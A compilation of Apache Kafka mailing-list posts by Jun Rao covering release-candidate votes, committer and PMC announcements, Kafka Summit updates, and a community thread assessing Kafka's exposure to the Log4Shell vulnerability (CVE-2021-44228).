from:"Jun Rao"

Re: [kafka-clients] Re: [VOTE] 3.2.0 RC0

2022-04-26 Thread Jun Rao

Hi, Bruno.

Thanks for the reply. Your understanding is correct. This is a regression
introduced only in the 3.2 branch.

Sorry for the late notice.

Jun

On Tue, Apr 26, 2022 at 10:04 AM Bruno Cadonna  wrote:

> Hi Jun,
>
> Thank you for your message!
>
> Now I see how this issue was introduced in 3.2.0. The fix for the bug
> described in KAFKA-12841 introduced it, right? I initially understood
> that the PR you want to include is the fix for the bug described in
> KAFKA-12841 which dates back to 2.6.
>
> I think that classifies as a regression.
>
> I will abort the voting and create a new release candidate.
>
> Best,
> Bruno
>
> On 26.04.22 18:09, 'Jun Rao' via kafka-clients wrote:
> > Hi, Bruno,
> >
> > Could we include https://github.com/apache/kafka/pull/12064
> > <https://github.com/apache/kafka/pull/12064> in 3.2.0? This fixes an
> > issue introduced in 3.2.0 where in some of the error cases, the producer
> > interceptor is called twice for the same record.
> >
> > Thanks,
> >
> > Jun
> >
> > On Tue, Apr 26, 2022 at 6:34 AM Bruno Cadonna  > <mailto:cado...@apache.org>> wrote:
> >
> > Hi all,
> >
> > This is a gently reminder to vote for the first candidate for
> > release of
> > Apache Kafka 3.2.0.
> >
> > I added the 3.2 documentation to the kafka site. That means
> > https://kafka.apache.org/32/documentation.html
> > <https://kafka.apache.org/32/documentation.html> works now.
> >
> > A successful system tests run can be found here:
> > https://jenkins.confluent.io/job/system-test-kafka/job/3.2/24/
> > <https://jenkins.confluent.io/job/system-test-kafka/job/3.2/24/>
> >
> > Thank you to Michal for voting on the release candidate.
> >
> > Best,
> > Bruno
> >
> > On 15.04.22 21:05, Bruno Cadonna wrote:
> >  > Hello Kafka users, developers and client-developers,
> >  >
> >  > This is the first candidate for release of Apache Kafka 3.2.0.
> >  >
> >  > * log4j 1.x is replaced with reload4j (KAFKA-9366)
> >  > * StandardAuthorizer for KRaft (KIP-801)
> >  > * Send a hint to the partition leader to recover the partition
> > (KIP-704)
> >  > * Top-level error code field in DescribeLogDirsResponse (KIP-784)
> >  > * kafka-console-producer writes headers and null values (KIP-798
> and
> >  > KIP-810)
> >  > * JoinGroupRequest and LeaveGroupRequest have a reason attached
> > (KIP-800)
> >  > * Static membership protocol lets the leader skip assignment
> > (KIP-814)
> >  > * Rack-aware standby task assignment in Kafka Streams (KIP-708)
> >  > * Interactive Query v2 (KIP-796, KIP-805, and KIP-806)
> >  > * Connect APIs list all connector plugins and retrieve their
> >  > configuration (KIP-769)
> >  > * TimestampConverter SMT supports different unix time precisions
> > (KIP-808)
> >  > * Connect source tasks handle producer exceptions (KIP-779)
> >  >
> >  > Release notes for the 3.2.0 release:
> >  >
> > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/RELEASE_NOTES.html
> > <https://home.apache.org/~cadonna/kafka-3.2.0-rc0/RELEASE_NOTES.html
> >
> >  >
> >  > *** Please download, test and vote by Monday, April 25, 9am CEST
> >  >
> >  > Kafka's KEYS file containing PGP keys we use to sign the release:
> >  > https://kafka.apache.org/KEYS <https://kafka.apache.org/KEYS>
> >  >
> >  > * Release artifacts to be voted upon (source and binary):
> >  > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/
> > <https://home.apache.org/~cadonna/kafka-3.2.0-rc0/>
> >  >
> >  > * Maven artifacts to be voted upon:
> >  >
> >
> https://repository.apache.org/content/groups/staging/org/apache/kafka/
> > <
> https://repository.apache.org/content/groups/staging/org/apache/kafka/>
> >  >
> >  > * Javadoc:
> >  > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/javadoc/
> > <https://home.apache.org/~cadonna/kafka-3.2.0-rc0/javadoc/>
> >  >
> >  > * Tag to be voted upon (off 3.2 branch) is the 3.2.0 tag:
> >  > https://github.com/apache/kafka/releases/tag/3.2.0-rc0
> > <https://github.com/apache/kafka/releases/tag/3.2.0-rc0>
> >  >
> >  &

Re: [VOTE] 3.2.0 RC0

2022-04-26 Thread Jun Rao

Hi, Bruno,

Could we include https://github.com/apache/kafka/pull/12064 in 3.2.0? This
fixes an issue introduced in 3.2.0 where in some of the error cases, the
producer interceptor is called twice for the same record.

Thanks,

Jun

On Tue, Apr 26, 2022 at 6:34 AM Bruno Cadonna  wrote:

> Hi all,
>
> This is a gently reminder to vote for the first candidate for release of
> Apache Kafka 3.2.0.
>
> I added the 3.2 documentation to the kafka site. That means
> https://kafka.apache.org/32/documentation.html works now.
>
> A successful system tests run can be found here:
> https://jenkins.confluent.io/job/system-test-kafka/job/3.2/24/
>
> Thank you to Michal for voting on the release candidate.
>
> Best,
> Bruno
>
> On 15.04.22 21:05, Bruno Cadonna wrote:
> > Hello Kafka users, developers and client-developers,
> >
> > This is the first candidate for release of Apache Kafka 3.2.0.
> >
> > * log4j 1.x is replaced with reload4j (KAFKA-9366)
> > * StandardAuthorizer for KRaft (KIP-801)
> > * Send a hint to the partition leader to recover the partition (KIP-704)
> > * Top-level error code field in DescribeLogDirsResponse (KIP-784)
> > * kafka-console-producer writes headers and null values (KIP-798 and
> > KIP-810)
> > * JoinGroupRequest and LeaveGroupRequest have a reason attached (KIP-800)
> > * Static membership protocol lets the leader skip assignment (KIP-814)
> > * Rack-aware standby task assignment in Kafka Streams (KIP-708)
> > * Interactive Query v2 (KIP-796, KIP-805, and KIP-806)
> > * Connect APIs list all connector plugins and retrieve their
> > configuration (KIP-769)
> > * TimestampConverter SMT supports different unix time precisions
> (KIP-808)
> > * Connect source tasks handle producer exceptions (KIP-779)
> >
> > Release notes for the 3.2.0 release:
> > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/RELEASE_NOTES.html
> >
> > *** Please download, test and vote by Monday, April 25, 9am CEST
> >
> > Kafka's KEYS file containing PGP keys we use to sign the release:
> > https://kafka.apache.org/KEYS
> >
> > * Release artifacts to be voted upon (source and binary):
> > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/
> >
> > * Maven artifacts to be voted upon:
> > https://repository.apache.org/content/groups/staging/org/apache/kafka/
> >
> > * Javadoc:
> > https://home.apache.org/~cadonna/kafka-3.2.0-rc0/javadoc/
> >
> > * Tag to be voted upon (off 3.2 branch) is the 3.2.0 tag:
> > https://github.com/apache/kafka/releases/tag/3.2.0-rc0
> >
> > * Documentation (not yet ported to kafka-site):
> > https://kafka.apache.org/32/documentation.html
> >
> > * Protocol:
> > https://kafka.apache.org/32/protocol.html
> >
> > * Successful Jenkins builds for the 3.2 branch:
> > I'll share a link once the builds complete
> >
> >
> > /**
> >
> > Thanks,
> > Bruno
>

Re: CVE-2021-44228 – Log4j 2 Vulnerability

2021-12-14 Thread Jun Rao

Hi, Everyone,

Just to provide an update. https://kafka.apache.org/cve-list is now updated
with this CVE.

Thanks,

Jun

On Tue, Dec 14, 2021 at 3:30 PM Jun Rao  wrote:

> Hi, Israel,
>
> Randall added some clarification for the connectors in the PR.
>
> Thanks,
>
> Jun
>
> On Tue, Dec 14, 2021 at 12:10 PM Israel Ekpo  wrote:
>
>> Do we want to add a disclaimer that users need to check their connectors
>> to
>> see if it uses log4j2?
>>
>> Though the core library does not use this dependency, it is possible
>> external connectors that use it could introduce vulnerabilities if they
>> depend on the affected log4j2 version
>>
>>
>> On Tue, Dec 14, 2021 at 1:40 PM Israel Ekpo  wrote:
>>
>> > Sure I will take a look at it shortly
>> >
>> > On Tue, Dec 14, 2021 at 12:44 PM Jun Rao 
>> wrote:
>> >
>> >> Hi, Luke,
>> >>
>> >> Thanks for the analysis. We are trying to put a public statement on
>> this
>> >> through this PR: https://github.com/apache/kafka-site/pull/388. If
>> anyone
>> >> has more feedback, we can iterate on the PR.
>> >>
>> >> Thanks,
>> >>
>> >> Jun
>> >>
>> >>
>> >> On Tue, Dec 14, 2021 at 7:53 AM Murilo Tavares 
>> >> wrote:
>> >>
>> >> > What about Kafka-Connect?
>> >> > Anyone has checked if any of the Confluent KafkaConnect docker images
>> >> embed
>> >> > log4j v2?
>> >> > Thanks
>> >> >
>> >> > On Mon, 13 Dec 2021 at 21:39, Luke Chen  wrote:
>> >> >
>> >> > > Hi all,
>> >> > >
>> >> > > Here's the comments for CVE-2021-44228 vulnerability *from SLF4J
>> >> > project*.
>> >> > > REF: http://slf4j.org/log4shell.html
>> >> > >
>> >> > > I think it's a analysis that worth reading. Most importantly, it
>> has
>> >> > > comments about log4j 1.x versions, which is currently Kafka used.
>> >> > > I quote some sentences here for your reference:
>> >> > >
>> >> > > 1. As *log4j 1.x *does NOT offer a JNDI look up mechanism at the
>> >> message
>> >> > > level,* it does NOT suffer from CVE-2021-44228.*
>> >> > > 2. However, log4j 1.x comes with JMSAppender which will perform a
>> JNDI
>> >> > > lookup if enabled in log4j's configuration file, i.e.
>> >> *log4j.properties*
>> >> > or
>> >> > > *log4j.xml*.
>> >> > > 3. In the absence of a new log4j 1.x release, you can remove
>> >> JMSAppender
>> >> > > from the *log4j-1.2.17.jar* artifact yourself. (commands are
>> listed in
>> >> > the
>> >> > > page <http://slf4j.org/log4shell.html>)
>> >> > > 4. Therefore, in addition to hardening KNOWN vulnerable components
>> in
>> >> > > aforementioned frameworks, we also recommend that *configuration
>> >> files be
>> >> > > protected against write access*. In Unix-speak they should be
>> >> *read-only
>> >> > > for all users, including the owner*. If possible, they should also
>> be
>> >> > > monitored against changes and unauthorized manipulation.
>> >> > >
>> >> > > Thank you.
>> >> > > Luke
>> >> > >
>> >> > > On Tue, Dec 14, 2021 at 12:55 AM David Ballano Fernandez <
>> >> > > dfernan...@demonware.net> wrote:
>> >> > >
>> >> > > > Thanks guys!
>> >> > > >
>> >> > > > On Mon, Dec 13, 2021 at 7:43 AM Brian Rickabaugh <
>> >> br...@rickabaugh.net
>> >> > >
>> >> > > > wrote:
>> >> > > >
>> >> > > > >   I strongly recommend that the Kafka community publish a
>> >> statement
>> >> > on
>> >> > > > this
>> >> > > > > vulnerability.
>> >> > > > >
>> >> > > > > This Log4J exploit is getting a lot of publicity in my
>> >> organization
>> >> > > and a
>> >> > > > > page to point our security team to would be very helpful.
>> >> > > > >
>> >

Re: CVE-2021-44228 – Log4j 2 Vulnerability

2021-12-14 Thread Jun Rao

Hi, Israel,

Randall added some clarification for the connectors in the PR.

Thanks,

Jun

On Tue, Dec 14, 2021 at 12:10 PM Israel Ekpo  wrote:

> Do we want to add a disclaimer that users need to check their connectors to
> see if it uses log4j2?
>
> Though the core library does not use this dependency, it is possible
> external connectors that use it could introduce vulnerabilities if they
> depend on the affected log4j2 version
>
>
> On Tue, Dec 14, 2021 at 1:40 PM Israel Ekpo  wrote:
>
> > Sure I will take a look at it shortly
> >
> > On Tue, Dec 14, 2021 at 12:44 PM Jun Rao 
> wrote:
> >
> >> Hi, Luke,
> >>
> >> Thanks for the analysis. We are trying to put a public statement on this
> >> through this PR: https://github.com/apache/kafka-site/pull/388. If
> anyone
> >> has more feedback, we can iterate on the PR.
> >>
> >> Thanks,
> >>
> >> Jun
> >>
> >>
> >> On Tue, Dec 14, 2021 at 7:53 AM Murilo Tavares 
> >> wrote:
> >>
> >> > What about Kafka-Connect?
> >> > Anyone has checked if any of the Confluent KafkaConnect docker images
> >> embed
> >> > log4j v2?
> >> > Thanks
> >> >
> >> > On Mon, 13 Dec 2021 at 21:39, Luke Chen  wrote:
> >> >
> >> > > Hi all,
> >> > >
> >> > > Here's the comments for CVE-2021-44228 vulnerability *from SLF4J
> >> > project*.
> >> > > REF: http://slf4j.org/log4shell.html
> >> > >
> >> > > I think it's a analysis that worth reading. Most importantly, it has
> >> > > comments about log4j 1.x versions, which is currently Kafka used.
> >> > > I quote some sentences here for your reference:
> >> > >
> >> > > 1. As *log4j 1.x *does NOT offer a JNDI look up mechanism at the
> >> message
> >> > > level,* it does NOT suffer from CVE-2021-44228.*
> >> > > 2. However, log4j 1.x comes with JMSAppender which will perform a
> JNDI
> >> > > lookup if enabled in log4j's configuration file, i.e.
> >> *log4j.properties*
> >> > or
> >> > > *log4j.xml*.
> >> > > 3. In the absence of a new log4j 1.x release, you can remove
> >> JMSAppender
> >> > > from the *log4j-1.2.17.jar* artifact yourself. (commands are listed
> in
> >> > the
> >> > > page <http://slf4j.org/log4shell.html>)
> >> > > 4. Therefore, in addition to hardening KNOWN vulnerable components
> in
> >> > > aforementioned frameworks, we also recommend that *configuration
> >> files be
> >> > > protected against write access*. In Unix-speak they should be
> >> *read-only
> >> > > for all users, including the owner*. If possible, they should also
> be
> >> > > monitored against changes and unauthorized manipulation.
> >> > >
> >> > > Thank you.
> >> > > Luke
> >> > >
> >> > > On Tue, Dec 14, 2021 at 12:55 AM David Ballano Fernandez <
> >> > > dfernan...@demonware.net> wrote:
> >> > >
> >> > > > Thanks guys!
> >> > > >
> >> > > > On Mon, Dec 13, 2021 at 7:43 AM Brian Rickabaugh <
> >> br...@rickabaugh.net
> >> > >
> >> > > > wrote:
> >> > > >
> >> > > > >   I strongly recommend that the Kafka community publish a
> >> statement
> >> > on
> >> > > > this
> >> > > > > vulnerability.
> >> > > > >
> >> > > > > This Log4J exploit is getting a lot of publicity in my
> >> organization
> >> > > and a
> >> > > > > page to point our security team to would be very helpful.
> >> > > > >
> >> > > > > Brian
> >> > > > >
> >> > > > > Quoting Luke Chen :
> >> > > > >
> >> > > > > > Due to this vulnerability is quite critical and "popular" in
> >> these
> >> > > > days,
> >> > > > > > should *Kafka have an official announcement in our security
> cve
> >> > list
> >> > > > page
> >> > > > > > or somewhere*? (i.e.
> >> > > > >
> >> > > >
> >> > >
> >> >

Re: CVE-2021-44228 – Log4j 2 Vulnerability

2021-12-14 Thread Jun Rao

Hi, Luke,

Thanks for the analysis. We are trying to put a public statement on this
through this PR: https://github.com/apache/kafka-site/pull/388. If anyone
has more feedback, we can iterate on the PR.

Thanks,

Jun


On Tue, Dec 14, 2021 at 7:53 AM Murilo Tavares  wrote:

> What about Kafka-Connect?
> Anyone has checked if any of the Confluent KafkaConnect docker images embed
> log4j v2?
> Thanks
>
> On Mon, 13 Dec 2021 at 21:39, Luke Chen  wrote:
>
> > Hi all,
> >
> > Here's the comments for CVE-2021-44228 vulnerability *from SLF4J
> project*.
> > REF: http://slf4j.org/log4shell.html
> >
> > I think it's a analysis that worth reading. Most importantly, it has
> > comments about log4j 1.x versions, which is currently Kafka used.
> > I quote some sentences here for your reference:
> >
> > 1. As *log4j 1.x *does NOT offer a JNDI look up mechanism at the message
> > level,* it does NOT suffer from CVE-2021-44228.*
> > 2. However, log4j 1.x comes with JMSAppender which will perform a JNDI
> > lookup if enabled in log4j's configuration file, i.e. *log4j.properties*
> or
> > *log4j.xml*.
> > 3. In the absence of a new log4j 1.x release, you can remove JMSAppender
> > from the *log4j-1.2.17.jar* artifact yourself. (commands are listed in
> the
> > page )
> > 4. Therefore, in addition to hardening KNOWN vulnerable components in
> > aforementioned frameworks, we also recommend that *configuration files be
> > protected against write access*. In Unix-speak they should be *read-only
> > for all users, including the owner*. If possible, they should also be
> > monitored against changes and unauthorized manipulation.
> >
> > Thank you.
> > Luke
> >
> > On Tue, Dec 14, 2021 at 12:55 AM David Ballano Fernandez <
> > dfernan...@demonware.net> wrote:
> >
> > > Thanks guys!
> > >
> > > On Mon, Dec 13, 2021 at 7:43 AM Brian Rickabaugh  >
> > > wrote:
> > >
> > > >   I strongly recommend that the Kafka community publish a statement
> on
> > > this
> > > > vulnerability.
> > > >
> > > > This Log4J exploit is getting a lot of publicity in my organization
> > and a
> > > > page to point our security team to would be very helpful.
> > > >
> > > > Brian
> > > >
> > > > Quoting Luke Chen :
> > > >
> > > > > Due to this vulnerability is quite critical and "popular" in these
> > > days,
> > > > > should *Kafka have an official announcement in our security cve
> list
> > > page
> > > > > or somewhere*? (i.e.
> > > >
> > >
> >
> https://urldefense.proofpoint.com/v2/url?u=https-3A__kafka.apache.org_cve-2Dlist=DwIFaQ=qE8EibqjfXM-zBfebVhd4gtjNZbrDcrKYXvb1gt38s4=p-f3AJg4e4Uk20g_16kSyBtabT4JOB-1GIb23_CxD58=bgQoydMIn6_TMXjRt2Jw8AUS-IPeFX07xSqA4ONmNUDFJXnB5xNHw7TFiy6UD4gP=lGTK9XqyO0i5KkSD6aOpmRxCVx90zrXNRtOq0vtSPSc=
> > > > )
> > > > >
> > > > > So far, my assessment is that, Kafka is not using log4j 2.x
> versions,
> > > so
> > > > > the risk is lower.
> > > > > Kafka is using log4j 1.x version. As long as users don't set the
> jms
> > > > > appender, with the *TopicBindingName* or
> > > > > *TopicConnectionFactoryBindingName
> > > > > *configured with the JNDI can handle (ex: "ldap://host:port/a;), it
> > is
> > > > > safe. (usually we don't set the topic name or factory name to this
> > kind
> > > > of
> > > > > for name)
> > > > >
> > > > > One thing to add is that, we are currently working on upgrading
> > log4j 1
> > > > to
> > > > > log4j 2 (KAFKA-9366 <
> > > >
> > >
> >
> https://urldefense.proofpoint.com/v2/url?u=https-3A__issues.apache.org_jira_browse_KAFKA-2D9366=DwIFaQ=qE8EibqjfXM-zBfebVhd4gtjNZbrDcrKYXvb1gt38s4=p-f3AJg4e4Uk20g_16kSyBtabT4JOB-1GIb23_CxD58=bgQoydMIn6_TMXjRt2Jw8AUS-IPeFX07xSqA4ONmNUDFJXnB5xNHw7TFiy6UD4gP=wNhgW9w7vSqIYgBLQ1iOcfBsQg3vHcPHxChyXqQ2-K0=
> > > > >),
> > > > > and we'll make sure it upgrades to 2.15.0 or newer versions.
> > > > >
> > > > > Thank you.
> > > > > Luke
> > > > >
> > > > > On Sun, Dec 12, 2021 at 12:00 PM Luke Chen 
> > wrote:
> > > > >
> > > > >> Hi David Ballano Fernandez and all,
> > > > >>
> > > > >> Some update here:
> > > > >> Based on @TopStreamsNet's comment here:
> > > > >>
> > > >
> > >
> >
> https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_apache_logging-2Dlog4j2_pull_608-23issuecomment-2D991723301=DwIFaQ=qE8EibqjfXM-zBfebVhd4gtjNZbrDcrKYXvb1gt38s4=p-f3AJg4e4Uk20g_16kSyBtabT4JOB-1GIb23_CxD58=bgQoydMIn6_TMXjRt2Jw8AUS-IPeFX07xSqA4ONmNUDFJXnB5xNHw7TFiy6UD4gP=z2x4txhlSwAoPNTeuYxZH8IVCHoGkhLsfbhWDH-SVG4=
> > > > >> log4j 1.x versions can still be vulnerable to this issue, but only
> > > when
> > > > >> the jms configuration: *TopicBindingName* or
> > > > >> *TopicConnectionFactoryBindingName* is set to something that JNDI
> > can
> > > > >> handle - for example "ldap://host:port/a;. In this way, JNDI will
> do
> > > > >> exactly the same thing it does for 2.x.
> > > > >> That is, *1.x is vulnerable, just attack vector is "safer" as it
> > > depends
> > > > >> on configuration rather than user input.*
> > > > >>
> > > > >> So, in short,

Re: updates on Kafka Summit in 2020

2020-04-28 Thread Jun Rao

Hi, Everyone,

Given the current global health crisis and ongoing uncertainty, we have
decided to go virtual for Kafka Summit "Austin."  The CFP deadline has been
extended to May 17, 2020. More details can be found at
https://events.kafka-summit.org/2020-faq.

Thanks,

Jun

On Wed, Apr 15, 2020 at 4:52 PM Jun Rao  wrote:

> Hi, Everyone,
>
> Here is an update on the upcoming Kafka Summit events in 2020.
>
> 1. Unfortunately, Kafka Summit London, originally planned on Apr 27/28,
> has been cancelled due to COVID-19.
>
> 2. Kafka Summit Austin (Aug 24/25) is still on. The CFP (
> https://events.kafka-summit.org/kafka-summit-austin-2020) is open until
> May 1.
>
> Thanks,
>
> Jun
>

updates on Kafka Summit in 2020

2020-04-15 Thread Jun Rao

Hi, Everyone,

Here is an update on the upcoming Kafka Summit events in 2020.

1. Unfortunately, Kafka Summit London, originally planned on Apr 27/28, has
been cancelled due to COVID-19.

2. Kafka Summit Austin (Aug 24/25) is still on. The CFP (
https://events.kafka-summit.org/kafka-summit-austin-2020) is open until May
1.

Thanks,

Jun

Re: [kafka-clients] [VOTE] 2.5.0 RC3

2020-04-13 Thread Jun Rao

Hi, David,

Thanks for running the release. Verified quickstart on the scala 2.12
binary. +1 from me.

Jun

On Tue, Apr 7, 2020 at 9:03 PM David Arthur  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the forth candidate for release of Apache Kafka 2.5.0.
>
> * TLS 1.3 support (1.2 is now the default)
> * Co-groups for Kafka Streams
> * Incremental rebalance for Kafka Consumer
> * New metrics for better operational insight
> * Upgrade Zookeeper to 3.5.7
> * Deprecate support for Scala 2.11
>
> Release notes for the 2.5.0 release:
> https://home.apache.org/~davidarthur/kafka-2.5.0-rc3/RELEASE_NOTES.html
>
> *** Please download, test and vote by Friday April 10th 5pm PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> https://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> https://home.apache.org/~davidarthur/kafka-2.5.0-rc3/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/org/apache/kafka/
>
> * Javadoc:
> https://home.apache.org/~davidarthur/kafka-2.5.0-rc3/javadoc/
>
> * Tag to be voted upon (off 2.5 branch) is the 2.5.0 tag:
> https://github.com/apache/kafka/releases/tag/2.5.0-rc3
>
> * Documentation:
> https://kafka.apache.org/25/documentation.html
>
> * Protocol:
> https://kafka.apache.org/25/protocol.html
>
> Successful Jenkins builds to follow
>
> Thanks!
> David
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/kafka-clients/CA%2B0Ze6rUxaPRvddHb50RfVxRtHHvnJD8j9Q9ni18Okc9s-_DSQ%40mail.gmail.com
> 
> .
>

[ANNOUNCE] New committer: Mickael Maison

2019-11-07 Thread Jun Rao

Hi, Everyone,

The PMC of Apache Kafka is pleased to announce a new Kafka committer Mickael
Maison.

Mickael has been contributing to Kafka since 2016. He proposed and
implemented multiple KIPs. He has also been propomating Kafka through blogs
and public talks.

Congratulations, Mickael!

Thanks,

Jun (on behalf of the Apache Kafka PMC)

Re: Add me to the contributors list...

2019-10-10 Thread Jun Rao

Hi, Senthil,

Thanks for your interest. Just added you to the contributors list and gave
you the wiki permissions.

Jun

On Thu, Oct 10, 2019 at 5:26 PM Senthilnathan Muthusamy
 wrote:

> Hi,
>
> I am Senthil from Microsoft Azure Compute and will be contributing to the
> KIP-280. Can you please add me to the contributors list and provide access
> to the KIP-280, JIRA & the repo.
>
> My details:
> Name: Senthilnathan Muthusamy
> Username: senthilm-ms
> Email: senth...@microsoft.com
>
> Thanks,
> Senthil
>

[ANNOUNCE] New Kafka PMC member: Sriharsh Chintalapan

2019-04-18 Thread Jun Rao

Hi, Everyone,

Sriharsh Chintalapan has been active in the Kafka community since he became
a Kafka committer in 2015. I am glad to announce that Harsh is now a member
of Kafka PMC.

Congratulations, Harsh!

Jun

Re: [kafka-clients] [VOTE] 2.1.1 RC2

2019-02-14 Thread Jun Rao

Hi, Colin,

Thanks for running the release. Verified the quickstart for 2.12 binary. +1
from me.

Jun

On Fri, Feb 8, 2019 at 12:02 PM Colin McCabe  wrote:

> Hi all,
>
> This is the third candidate for release of Apache Kafka 2.1.1.  This
> release includes many bug fixes for Apache Kafka 2.1.
>
> Compared to rc1, this release includes the following changes:
> * MINOR: release.py: fix some compatibility problems.
> * KAFKA-7897; Disable leader epoch cache when older message formats are
> used
> * KAFKA-7902: Replace original loginContext if SASL/OAUTHBEARER refresh
> login fails
> * MINOR: Fix more places where the version should be bumped from 2.1.0 ->
> 2.1.1
> * KAFKA-7890: Invalidate ClusterConnectionState cache for a broker if the
> hostname of the broker changes.
> * KAFKA-7873; Always seek to beginning in KafkaBasedLog
> * MINOR: Correctly set dev version in version.py
>
> Check out the release notes here:
> http://home.apache.org/~cmccabe/kafka-2.1.1-rc2/RELEASE_NOTES.html
>
> The vote will go until Wednesday, February 13st.
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~cmccabe/kafka-2.1.1-rc2/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~cmccabe/kafka-2.1.1-rc2/javadoc/
>
> * Tag to be voted upon (off 2.1 branch) is the 2.1.1 tag:
> https://github.com/apache/kafka/releases/tag/2.1.1-rc2
>
> * Jenkins builds for the 2.1 branch:
> Unit/integration tests: https://builds.apache.org/job/kafka-2.1-jdk8/
>
> Thanks to everyone who tested the earlier RCs.
>
> cheers,
> Colin
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/kafka-clients/ea314ca1-d23a-47c4-8fc7-83b9b1c792db%40www.fastmail.com
> .
> For more options, visit https://groups.google.com/d/optout.
>

Hackathons with funding of the EU

2019-02-12 Thread Jun Rao

Hi Guys,

I am passing along the following info from EU. If you are interested in the
event, please contact the coordinator. Thanks.

The EU via its EU-FOSSA 2 project have invited a number of communities
including Apache Kafka to consider taking one of their 3 planned Hackathons
this year, to be held in Brussels on 6/7 April, 4/5 May and 5/6 Oct. They
will also pay for transportation, accommodation and food for 35-50
individuals (plus/minus) for each event. Each event will be dedicated to
one open source community.

I am sending this email to establish the level of interest within the Kafka
community for such an event. Let me know. Here is some more background.

EU-FOSSA 2 Hackathons

The EU-FOSSA 2 project aims to improve security of open source software the
European institutions use, e.g. via Bug Bounties and other initiatives. The
project also aims to bring open source communities together via three
planned Hackathons in Brussels. At these Hackathons, the software community
can solve any problems they feel necessary, security or non-security.

Though Security is the main project theme, it is not a prerequisite that
the community fix bugs at the Hackathon or that they work on a specific
thing at all. The main idea is to bring them together if they think that’s
helpful to them - and ideally bring them together in Brussels with EU
institutions folk involved in that community.

Hackathon Ideas/Themes

   - hold competitions, and/or discuss other ways to benefit/strengthen the
   community, and in doing so ensure continuity and benefit for the open
   source community
   - look at say, software governance, risk management, release management,
   architecture, new features/roadmap, embracing new technologies/ideas to
   help improve the software or related subjects
   - Or any other idea on what the community needs or could benefit from

Contact: Miss Suwon Ham at s...@bemyapp.com

Jun

Re: [ANNOUNCE] New Committer: Vahid Hashemian

2019-01-15 Thread Jun Rao

Congratulations, Vahid.

Thanks,

Jun

On Tue, Jan 15, 2019 at 2:45 PM Jason Gustafson  wrote:

> Hi All,
>
> The PMC for Apache Kafka has invited Vahid Hashemian as a project
> committer and
> we are
> pleased to announce that he has accepted!
>
> Vahid has made numerous contributions to the Kafka community over the past
> few years. He has authored 13 KIPs with core improvements to the consumer
> and the tooling around it. He has also contributed nearly 100 patches
> affecting all parts of the codebase. Additionally, Vahid puts a lot of
> effort into community engagement, helping others on the mail lists and
> sharing his experience at conferences and meetups.
>
> We appreciate the contributions and we are looking forward to more.
> Congrats Vahid!
>
> Jason, on behalf of the Apache Kafka PMC
>

Re: Kafka Summit NYC and London in 2019

2018-12-17 Thread Jun Rao

Hi, Everyone,

This is a reminder about the deadline for proposal this Thursday.

Thanks,

Jun

On Tue, Dec 4, 2018 at 1:49 PM Jun Rao  wrote:

> Hi, Everyone,
>
> We have two upcoming Kafka Summits, one in NYC and another in London. The
> deadline for summiting proposals is Dec 20 for both events. Please consider
> submitting a proposal if you are interested. The Links to submit abstracts
> are
>
> Kafka Summit NYC - https://myeventi.events/kafka19/ny/cfp/
> Kafka Summit London - https://myeventi.events/kafka19/gb/cfp/
>
> Thanks,
>
> Jun
>

Kafka Summit NYC and London in 2019

2018-12-04 Thread Jun Rao

Hi, Everyone,

We have two upcoming Kafka Summits, one in NYC and another in London. The
deadline for summiting proposals is Dec 20 for both events. Please consider
submitting a proposal if you are interested. The Links to submit abstracts
are

Kafka Summit NYC - https://myeventi.events/kafka19/ny/cfp/
Kafka Summit London - https://myeventi.events/kafka19/gb/cfp/

Thanks,

Jun

Re: [ANNOUNCE] Apache Kafka 2.0.1

2018-11-09 Thread Jun Rao

Thanks for running the release, Mani!

Jun

On Fri, Nov 9, 2018 at 11:42 AM, Manikumar  wrote:

> The Apache Kafka community is pleased to announce the release for Apache
> Kafka 2.0.1
>
> This is a bug fix release and it includes fixes and improvements from 51
> JIRAs.
>
> All of the changes in this release can be found in the release notes:
> https://www.apache.org/dist/kafka/2.0.1/RELEASE_NOTES.html
>
>
> You can download the source and binary release (Scala 2.11 and Scala 2.12)
> from:
> https://kafka.apache.org/downloads#2.0.1
>
> 
> ---
>
>
> Apache Kafka is a distributed streaming platform with four core APIs:
>
>
> ** The Producer API allows an application to publish a stream records to
> one or more Kafka topics.
>
> ** The Consumer API allows an application to subscribe to one or more
> topics and process the stream of records produced to them.
>
> ** The Streams API allows an application to act as a stream processor,
> consuming an input stream from one or more topics and producing an
> output stream to one or more output topics, effectively transforming the
> input streams to output streams.
>
> ** The Connector API allows building and running reusable producers or
> consumers that connect Kafka topics to existing applications or data
> systems. For example, a connector to a relational database might
> capture every change to a table.
>
>
> With these APIs, Kafka can be used for two broad classes of application:
>
> ** Building real-time streaming data pipelines that reliably get data
> between systems or applications.
>
> ** Building real-time streaming applications that transform or react
> to the streams of data.
>
>
> Apache Kafka is in use at large and small companies worldwide, including
> Capital One, Goldman Sachs, ING, LinkedIn, Netflix, Pinterest, Rabobank,
> Target, The New York Times, Uber, Yelp, and Zalando, among others.
>
> A big thank you for the following 40 contributors to this release!
>
> Amit Sela, Anna Povzner, Arjun Satish, Bibin Sebastian, Bill Bejeck, Bob
> Barrett, Bridger Howell,
> Colin Hicks, Dhruvil Shah, Dong Lin, Flavien Raynaud, Guozhang Wang, huxi,
> huxihx, Ismael Juma,
> Jason Gustafson, Joan Goyeau, John Roesler, Jon Lee, Kamal Chandraprakash,
> Kevin Lafferty,
